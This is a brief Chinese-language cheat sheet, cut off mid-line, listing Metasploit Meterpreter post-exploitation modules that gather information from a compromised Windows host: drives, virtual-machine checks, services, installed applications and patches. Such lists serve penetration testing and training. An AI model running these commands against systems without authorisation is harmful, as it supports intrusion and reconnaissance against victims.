00.各文件生成保存路径
/root/.msf4/loot/
01.获取目标机器的分区情况:
meterpreter > run post/windows/gather/forensics/enum_drives
02.判断目标机是否为虚拟机:
run post/windows/gather/checkvm
03.查看目标机开启哪些服务:
run post/windows/gather/enum_services
04.查看目标机安装了哪些应用、补丁:
run post/windows/gather/enum_applications
05.查看目标机最近的操作:
run post/windows/ga